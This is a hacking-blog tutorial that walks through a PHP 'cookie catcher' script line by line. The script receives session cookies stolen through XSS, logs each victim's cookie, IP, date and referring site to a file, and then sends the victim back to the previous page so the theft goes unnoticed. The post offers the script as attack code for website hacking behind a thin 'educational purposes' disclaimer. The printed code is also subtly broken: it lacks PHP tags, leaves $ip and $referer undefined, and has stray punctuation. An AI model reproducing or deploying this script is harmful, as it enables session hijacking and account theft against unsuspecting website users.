Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects

Write at HWS !!!

Guest Posting

Monday, November 21, 2011

Splitting the Cookie Catcher Code Line by Line for Understanding

Hello guys , hope you all are fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic and there's nothing difficult to understand in it and we all know this is used in XSS Attack for the purpose of Website Hacking .Today in this post I am going to split up the code of cookie catcher line by line to make you understand what actually this code is doing.This tutorial is just for understanding the cookie catcher code to develop programming approach in you but if you don't want to go in depth of code then simply skip this topic.

Complete Cookie Catcher Code

  • This is the same code as I have posted in previous tutorial.
$cookie = $_GET['cookie'];
$date=date(“j F, Y, g:i a”);;
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
header ("javascript:history.back()");

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and giving the description of what this line of code is doing in actual.
Write the Code Here
  • These two code lines tell the server that the code written inside them is php code.
  • First line is the starting line of code and and the second tells about its end and the code comes within these lines.
$cookie = $_GET['cookie'];
  • This line is the backbone of the Cookie Catcher Code,it gets the cookie from the web browser using php's GET statement
  • REMOTE_ADDR is the user's IP and due to this command we are able to get the ip address of user as well.
$date=date(“j F, Y, g:i a”);
  • Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.
  • HTTP_REFERER is the site from where the user clicked your script and his cookie are captured.Its actually the same site where you have posted your script.
$fp = fopen('cookies.html' 'a');
  •  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);
  • In the previous code ,we opened a file named cookies.html, now we have to write the captured cookies in it so this code actually do this thing.
  • It writes the Cookie ,Date and Time and Website in the opened file cookies.html .
  • After writing all the data in cookies.html ,this code finally close the file.
header ("javascript:history.back()");
  • This final line of code sends the user back to the last page fro where he clicked on your link.
  • This code is very useful as victim has no idea that his cookies are captured.
That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .
NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
In 41 people's circles

Subscribe To Get FREE Tutorials!

Respected Readers:
As a 21 year old student, the only income I rely on is my pocket money. Bearing the running costs of HWS Blog has become really difficult. We educate thousands of bloggers a week with our tutorials. To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.


Confused? Feel free to ask

Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Please do not spam Spam comments will be deleted immediately upon my review.

XEO Hacker

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More


Recent Posts

Join Me On Facebook

700+ Followers


meet women in Ukraine contatore visite website counter

Recent Comments

Follow Me On Twitter

1112+ Followers